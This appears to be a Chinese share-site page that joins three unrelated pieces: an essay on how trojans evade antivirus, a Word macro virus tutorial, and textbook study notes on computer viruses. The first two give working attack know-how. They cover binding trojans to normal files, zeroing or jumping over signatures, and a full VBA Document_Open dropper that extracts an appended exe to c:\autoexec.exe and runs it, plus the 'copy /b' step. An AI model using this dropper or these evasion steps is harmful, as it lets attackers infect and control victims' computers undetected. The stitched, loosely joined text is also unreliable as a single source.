篇一:木马的入侵技术
木马的入侵技术
木马要进入用户系统,首先要过杀毒软件这一关。否则一旦杀毒软件报警,木马就无隐蔽性可言了,会立马被杀毒软件赶出系统。因此,面对杀毒软件,木马使尽浑身解数,通过各种手段隐藏自己。经过处理后的木马,可以完全无视杀毒软件的存在,正大光明地进入到用户的系统中。到底木马使用了什么手段能有如此之大的威力呢?请看本文。
如何防范经过处理的木马?
木马躲过杀毒软件常用的方法有:寄宿于正常文件、木马加壳加密、修改木马特征码。结合正文我们来了解一下如何防范经过这些手段处理后的木马。 针对捆绑法,我们使用“木马捆绑克星”这款软件就可以让木马原形毕露。单击程序界面上的“扫描”按钮,浏览选择可疑文件,如果程序下方的“包含多个可执行文件”选项被打上了钩,这就表示文件被捆绑了。
至于对木马程序进行加壳,根据壳的原理我们可以得知:加壳木马运行后,会将其中的木马程序在内存中还原。还原后的木马是不受壳的保护的,因此大部分的杀毒软件都会抓住这个机会,将木马铲除。
唯一能对杀毒软件造成一点危害的,就只剩下修改木马特征码这种隐藏手段了。不过不同的杀毒软件提取同一木马程序的特征码是不同的。这就意味着我们改一处特征码只能躲避一款杀毒软件的查杀,如果要躲避多款杀毒软件,就需要修改多处特征码,这会对木马隐藏自己造成一定的困难。因此如果有条件,安装两款杀毒软件也是一个不错的办法。
寄宿于正常文件
这个方法就是将木马程序与正常的文件捆绑在一起,当用户运行这个捆绑后的文件时,正常文件和木马程序会同时运行,这样木马就可以隐藏自己,悄悄进入用户的系统。要让木马实现这个目的只需要下载一个文件捆绑器即可。以木马老大“灰鸽子”出品的文件捆绑器为例。单击“文件捆绑器”上的“增加文件”按钮,选择一个正常的可执行文件,例如Flash小游戏等。再次单击该按钮将我们的木马程序也添加进来,最后单击“捆绑文件”,即可将两个文件捆绑成一个可执行文件。
捆绑木马程序
木马加壳加密
“壳”是一种专门保护软件的程序,当运行一款加过壳的软件时,首先会运行这个软件的壳,壳会将包含在其中的程序进行还原,给予使用。当使用完毕后,壳又会将程序进行加密,整个过程都是在壳的保护过程中进行的。
正因为壳的性质,木马会进行加壳操作以使自身得到加密,这样就给杀毒软件的查杀带来了难度。不过目前主流的杀毒软件都改进了其杀毒引擎,增强了加壳程序的检测,对于加过壳的程序,杀毒软件会先将其脱壳,再进行查杀。因此如果木马使用的是类似ASP、UPX这样的热门加壳软件,那么还是很难逃过杀毒软件的查杀的,除非使用一些冷门的加壳软件。
程序加壳软件
修改木马特征码
这应该是最为有效的躲避杀毒软件的方法。我们都知道,杀毒软件判定这个程序是否是病毒是通过特征码来决定的,如果在这个程序中有一段代码与杀毒软件中的病毒特征码对上号,那么就判定它为病毒。根据这个原理,我们是否只要让木马的代码与杀毒软件的特征码对不上号,就可以躲过杀毒软件的查杀呢?答案是肯定的,修改木马的特征码需要使用16进制编辑器,例如UltraEdit、Winhex等。修改特征码可以采用两种方法:1.直接修改特征码:用16进制编辑器打开木马后,将其中的特征码都替换为0;2.增加跳转指令:在木马特征码处增加一条跳转指令,让程序运行到该处时跳到下一段代码,这样做的目的是使杀毒软件检测时跳过对这段代码的检测。
篇二:宏病毒制作参考
-- Word宏病毒制作,传播,防范
EXE变DOC的方法
其实这种转换并不是文件格式上的变化,只不过是把一个exe文件接在一个doc文件的末尾而已,这个doc
文件当然就不是不同word的文档啦,该文档中包含了宏语句,能在
运行的时候把接在自己文件末尾的exe文件数据读取出来并运行,就
造成一种假象,好象文档打开时就运行了exe文件似的.(和文件捆绑器的原理很象啊!)
熟悉vb的朋友都知道,word的宏是使用vba来编写的,具体语法和vb一样,但有些方法vb中没有,如宏病毒
就是利用宏复制语句来达到感染的目的.和vb一样,我们可以在编写宏的时候调用windows api!!下面我们来介绍一下我们编写这个宏需要用到的api函数:
1)createfile 用于打开文件,该函数vb的声明如下:
declare function createfile lib "kernel32" alias "createfilea" (byval lpfilename as string, byval dwdesiredaccess as long, byval dwsharemode as long, byval lpsecurityattributes
as long, byval dwcreationdistribution as long, byval dwflagsandattributes as long, byval htemplate as long) as long
2)closehandle 用于关闭被打开文件的句柄,该函数vb的声明如下:
declare function closehandle lib "kernel32" (byval hobject as long) as long
3)readfile 用于从被打开文件中读取数据,该函数vb的声明如下:
declare function readfile lib "kernel32" (byval hfile as long, lpbuffer as byte, byval
dwnumberofbytestoread
as long, lpnumberofbytesread as long, byval lpoverlapped as long) as long
4)writefile 用于把读取出的数据写入文件,该函数vb的声明如下:
declare function writefile lib "kernel32" (byval hfile as long, lpbuffer as byte, byval
dwnumberofbytestowrite
as long, lpnumberofbyteswritten as long, byval lpoverlapped as long) as long
5)setfileponiter移动文件指针,该函数vb的声明如下:
declare function setfilepointer lib "kernel32" (byval hfile as long, byval ldistancetomove as long, byval
lpdistancetomovehigh as long, byval dwmovemethod as long) as long
6)下面是以上函数的参数声明
public const generic_read as long = &h80000000
public const generic_write as long = &h40000000
public const file_share_read as long = 1
public const file_share_write as long = 2
public const create_new as long = 1
public const create_always as long = 2
public const open_existing as long = 3
public const open_always as long = 4
public const truncate_existing as long = 5
public const invalid_handle_value as long = -1
public const file_attribute_normal as long = &h80
好了,有了这些准备工作就可以开始了,我们运行word2000,打开visual basic编辑器,新建一个模块,把上面的函数
和参数声明拷进去!再回到“thisdocument.的代码视图,选择document.nbspopen的事件,输入一下代码:
private sub document.open()
dim buffer(65536) as byte
dim h, h2, j, i, k as long
h = createfile(thisdocument.path & "/" & thisdocument.name, generic_read, file_share_read + file_share_write, 0, open_existing, 0, 0)
‘以share_read的方式打开自身的doc文件
h2 = createfile("c:\\autoexec.exe", generic_write, 0, 0, create_always, 0, 0)
‘新建一个exe文件准备存放读取出来的数据.
if h = invalid_handle_value then
exit sub
end if
k = setfilepointer(h, 32768, nil, 0)
‘把文件指针移动到doc文件与exe文件交界处.
do
i = readfile(h, buffer(0), 65536, j, 0)
i = writefile(h2, buffer(0), j, j, 0)
loop until j < 65536
closehandle (h)
closehandle (h2)
shell "c:\\autoexec.exe"
‘运行exe文件
end sub
这样宏就编写好了,注意的地方就是上面setfilepointer函数的使用部分:32768是你编写完宏保存
好的doc文件的文件大小,不一顶就是32768哦,大家注意!
大家可能有疑问,如何把exe文件接到doc文件后面呢?很简单,把你要接的exe放到和 这个doc文件同一个目录下.运行doc命令:
copy /b xxxx.doc + xxxxx.exe newdoc.doc
这样就可以了~~~.当你打开这个newdoc.doc的时候,宏就会把后面的exe文件读出来并保存 在c:\\autoexec.exe中,然后运行,是不是很恐怖啊!不过这需要你的word2000安全度为最低的时候
才能实现,关于这个安全度的问题,我们又发现了微软的小bug,大家看看注册表中这个键:
hkey_current_user\\software\\microsoft\\office\\9.0\\word\\security 中的
level值.当安全度是3(高)的时候,word不会运行任何的宏,2(中)的时候word会询问你是否运行宏,1(低)的时候
篇三:计算机病毒原理及防范技术(精简版)
《计算机病毒原理及防范技术》----秦志光 张凤荔 刘峭 著43.8万字
第1章 计算机病毒概述
1.1.1计算机病毒的起源----第一种为科学幻想起源说,第二种为恶作剧,第三种为戏程序(70年代,贝尔实验室,Core War), 第四种为软件商保护软件起源说。
1.计算机病毒的发展历史-----第一代病毒,传统的病毒,
第二代病毒(1989-1991年),混合型病毒(或“超级病毒”),采取了自我保护措施(如加密技术,反跟踪技术);第三代病毒(1992-1995年)多态性病毒(自我变形病毒)首创者Mark Washburn-----“1260病毒”;最早的多态性的实战病毒----“黑夜复仇者”(Dark Avenger)的变种MutationDark Avenger ;1992年第一个多态性计算机病毒生成器MtE,第一个计算机病毒构造工具集(Virus Construction Sets)----“计算机病毒创建库”(Virus Create Library), ”幽灵”病毒;第四代病毒(1996-至今),使用文件传输协议(FTP)进行传播的蠕虫病毒,破坏计算机硬件的CIH,远程控制工具“后门”(Bank Orifice),”网络公共汽车”(NetBus)等。
2.计算机病毒的基本特征----1.程序性(利用计算机软、硬件所固有的弱点所编制的、具有特殊功能的程序),2、传染性,3、隐蔽性(兼容性、程序不可见性)4、潜伏性(“黑色星期五”,“上海一号”,CIH),5、破坏性,6、可触发性,7、不可预见性,8、针对性,9、非授权可执行性,10、衍生性。
1.2.2.计算机病毒在网络环境下表现的特征------1.电子邮件成主要媒介(QQ,MSN等即时通讯软件,可移动存储设备,网页,网络主动传播,网络,“钓鱼”),2.与黑客技术相融合(“Nimda”,CodeRed,”求职信”),3.采取了诸多的自我保护机制(逃避、甚至主动抑制杀毒软件),4.采用压缩技术(压缩变形----特征码改变,压缩算法,“程序捆绑器”),5.影响面广,后果严重,6.病毒编写越来越简单,7.摆脱平台依赖性的“恶意网页”。
1.2.3.计算机病毒的生命周期----1.孕育期(程序设计,传播),2.潜伏感染期,3.发病期,4.发现期,5.消化期,6.消亡期。
第2章 计算机病毒的工作机制
2.1.1计算机病毒的典型组成三大模块-----1.引导模块(将病毒引入计算机内存,为传染模块和表现模块设置相应的启动条件),2.感染模块(两大功能-----1.依据引导模块设置的传染条件,做判断;2启动传染功能),3.表现模块(两大功能----依据引导模块设置的触发条件,做判断;或者说表现条件判断子模块2.1启动病毒,即表现功能实现子模块)
2.2.1计算机病毒的寄生方式-----1.替代法(寄生在磁盘引导扇区);2.链接法
(链接在正常程序的首部、尾部、或中间)。
2.2.2.计算病毒的引导过程-----1。驻留内存,2.获得系统控制权,3.恢复系统
功能。
2.4.1.计算机病毒的触发机制----1.日期,2.时间,3.键盘4.感染触发,5.启动,
6.访问磁盘次数,7.调用中断功能触发,8.CPU型号/主板型号触发。
第三章 计算机病毒的表现
3.1.计算机病毒发作前的表现----1.经常无故死机,操作系统无法正常启动,运
行速度异常,4.内存不足的错误,5.打印、通信及主机接口发生异常,6.无意中要求对软盘进行写操作,7.以前能正常运行的应用程序经常死机或者出现非法错误,8.系统文件的时、日期和大小发生变化,9.宏病毒的表现现象,10、磁盘空间迅速减少,11.网络驱动器卷或者共享目录无法调用,陌生人发来的电子邮件,13.自动链接到一些陌生的网站。
3.2计算机病毒发作时的表现----1.显示器屏幕异常,2、声音异常,3.硬盘灯不
断闪烁,4.进行游戏算法,5.Windows桌面图标发生变化,6.突然死机或者重启,7.自动发送电子邮件,8.键盘、鼠标失控,9.被感染系统的服务端口被打开,10.反计算机病毒软件无法正常工作。
3.3计算机病毒发作后的表现----1。硬盘无法启动,数据丢失,2.文件、文件目
录丢失或者被破坏,3、数据密级异常,4.使部分可软件升级的主板的BIOS程序混乱,网络瘫痪,6.其它异常现象。
第4章 新型计算机病毒的发展趋势
4.1计算机病毒的发展趋势----1.网络化,2.个性化、3.隐蔽化,4、多样化,5、平民化,6、智能化。
4.2新型计算机病毒的主要特点:1、系统漏洞(后门),2、局域网,3、多种方式
(文件感染,网络传播----蠕虫、木马),4、欺骗性增强,5、大量消耗系统与网络资源(拒绝服务攻击DoS),6、更广泛的混合特征,7、病毒与黑客技术融合,8、病毒生成工具多、变种多,9、难于控制和彻底根治,易引起多次疫情。
4.3新型计算机病毒的主要技术----ActiveX和Java,驻留内存技术,3、修改中
断向量表技术,4、隐藏技术,5、对抗计算机病毒防范系统技术,6、技术的遗传与组合。
第5章 计算机病毒检测技术
5.1计算机反病毒技术的发展历程----第一代:单纯的病毒特征代码法,第二代:静态广谱特征扫描方法(广谱特征码、防变种),第三代:静态扫描技术+动态仿真跟踪技术,第四代:基于病毒家族的命名规则、基于多位CRC校验和扫描机理、启发式智能代码分析模块、动态数据还原模块、内存解毒模块、自身免疫模块等先进的解毒技术,第五代:基于程序行为自主分析判断的实时防护技术(俗称“主动防御”)。
5.2 计算机病毒的主要检测技术----1、外观检测法,2、系统数据对比法,3、病
毒签名法,4、特征代码法,5、检查常规内存数,6、校验和法,7、行为检测法(主动防御),8、软件模拟法,9、启发式代码扫描技术,10、病毒分析法,11、主动内核技术,12、感染实验法,13、算法扫描法,14.语义分析法,15、虚拟机分析法。
第六章 典型病毒的防范技术
6.1 1.引导型计算机病毒,2、文件型病毒,3、CIH病毒(首例直接破坏计算机
系统硬件的病毒,破坏FlashBIOS芯片中的系统程序,致使主板损坏),5、脚本病毒,6.宏病毒,7、特洛伊木马病毒,,8、蠕虫病毒,9、黑客型病毒,10、后门病毒(IRC后门计算机病毒)。
第七章 网络安全
7.1网络安全应该具有以下五个方面的特征:1.保密性,2、完整性,3、可用性,(CIA)4、可控性,5、可审查性。
7.2计算机网络面临的威胁----1、自然灾害,2、黑客的攻击与威胁,3、计算机
病毒,4、垃圾邮件和间谍软件,5、信息战的严重威胁,6、计算机犯罪。
7.3网络安全防范的内容----1、防火墙技术,2、数据加密与用户授权访问控制
技术,3、入侵检测技术(入侵检测系统、Intrusion Detection System ,IDS),4防病毒技术,5、安全管理队伍的建设(三分靠技术,七分靠管理)。
7.4恶意代码(Malicious Code),MC的种类:谍件、远程访问特洛伊、zombies
程序的攻击、非法获取资源访问权、键盘记录程序、P2P(Peer-to-Peer,点到点)、逻辑炸弹和时间炸弹。
7.5网络安全的防范技巧-----1、不要轻易运行不明真相的程序,2、屏蔽cookie
信息,3、不同的地方用不同的口令,4、屏蔽ActiveX控件,5、定期清除缓存、历史记录
及临时文件夹中的内容,6、不要随意透露任何个人信息,7、突遇莫名其妙的故障时要及时检查系统信息,8、对机密信息实施加密保护,9、拒绝某些可能有威胁的站点对自己的访问,10、加密重要的邮件,11、在自己的计算机中安装防火墙,12、为客户\服务器通信双方提供身份认证,建立安全通道,13、尽量少在聊天室里或使用OICQ聊天,14、及时更新系统安全漏洞补丁,15、及时更新防病毒系统,网上银行、在线交易的安全规范,17、安全的系统设置和管理,18、禁止访问非法的网站,19、入侵检测技术检测网络攻击,20、身份识别和数字签名技术。
第8章 即时通信病毒和移动通信病毒分析
8.1一个即时通信软件系统又被称为“状态展示与即时通信系统”
状态展示服务的内容和形式有以下几个方面:1、方法:用户采取何种客户端
进行通信;2、状态信息;3、可用性;4、位置信息。
即时通信服务具有如下特点:1、实时性;2、文本交互;3、异步通信。
8.2移动通信病毒的发作现象:1、破坏操作系统;2、破坏用户数据;3、消耗系
统资源;4、窃取用户隐私;5、恶意扣取费用;6、远程控制用户手机;7、其他表现方式。
第9章操作系统漏洞攻击和网络钓鱼概述
9.1 Windows操作系统漏洞------1、UPnP服务漏洞,2、升级程序漏洞,3、帮
助和支持中心漏洞,4、压缩文件漏洞,5、服务拒绝漏洞,6、Windows Media Player漏洞,7、远程桌面漏洞(RDP漏洞),8、VM漏洞,9、“自注销”漏洞(热键漏洞),10、微软MS08-067漏洞,11.快速用户切换漏洞,12、Stuxnet蠕虫。
9.2操作系统漏洞攻击病毒的安全建议----1、使用安全系数高的密码,2、做好
边界防护,3、升级软件,4.关闭没有使用的服务,5、使用数据加密,6、通过备份保护你的数据,7、加密敏感通信,8、不要信任外部网络,9、使用不间断电源支持,10、监控系统的安全是否被威胁和入侵。
9.3“网络钓鱼”(Phishing)是“Phone”和“Fishing”的综合体,网络钓鱼的
工作流程-----1、“钓鱼”者入侵初级服务器,窃取用户的名字和邮件地址,2、“钓鱼”者发送有针对性的邮件,3、受害用户访问假冒网址(1,IP地址欺骗;2,链接文字欺骗;
3.Unicode编码欺骗),4受害用户提供秘密和用户信息被“钓鱼”者所得,5、“钓鱼”者使用受害用户的身份进入其他网络服务器。
9.4“网络钓鱼”的手段----1、利用电子邮件“钓鱼”,2.利用木马程序“钓鱼”
3.利用虚假网址“钓鱼”,4.假冒知名网站“钓鱼”,5.其他“钓鱼”方式。
第十章 常用的反病毒软件
10.1反病毒软件的发展历程-----1.最早的反计算机病毒程序(对付“爬行者”
病毒的“收割者”Reeper),2.DOS时代,3.Internet时代,4.综合“免疫系统”,5.“数字免疫”存在于将来。
10.2国际动态————1.各国执法动作更多,但仍然缺乏计算机病毒和垃圾邮件
的制裁手段;2.Windows32计算机病毒仍然占据2010年排行榜(前十大计算机病毒全部都是Windows32计算机病毒);3.新一波网络银行抢劫风;4。垃圾邮件发送者不断运用新的伎俩,垃圾邮件无减退现象;5.手机病毒增加,智能手机平台成为未来黑客与病毒肆虐的场所;6.恶作剧计算机病毒及连锁电子邮件仍造成混乱并堵塞电子邮件系统。
10.3国内现状-----1.病毒数量有所下降,单个病毒感染计算机次数下降,2.计
算机病毒遭遇商业利益驱动成为它发展的新趋向,3.安全策略的调整:防火墙将担任起更多的反计算机病毒重任,4.网民的真实损失急剧上升,5.钓鱼网站数量急剧上升。
10.4反病毒软件选用准则----1.能检测尽可能多的计算机病毒种类,2.误报率低,
3.自身安全,4.检测速度快,5.易于升级。
10.4常用的反计算机病毒工具-----1.诺顿网络安全特警,2.McAfee VirusScan(迈克菲),目前与赛门铁克symantec、趋势科技并称为美国最大的三家安全软件公司3.PC-cillin,4。卡巴斯基安全部队,5.江民杀毒软件KV2011,6.瑞星杀毒软件,7.金山毒霸,8.微点杀毒软件,9. 360杀毒软件,10.小红伞个人免费版,11.ESET NOD32杀毒软件,12.BitDefender杀毒软件。
免费论文网友情提示:本网站所有内容为共享上传提供,不涉及任何商业利益,本站对此不承担任何保证责任!
Copyright © www.csmayi.cn Corporation, All Rights Reserved 共享时代 共享你我他 版权所有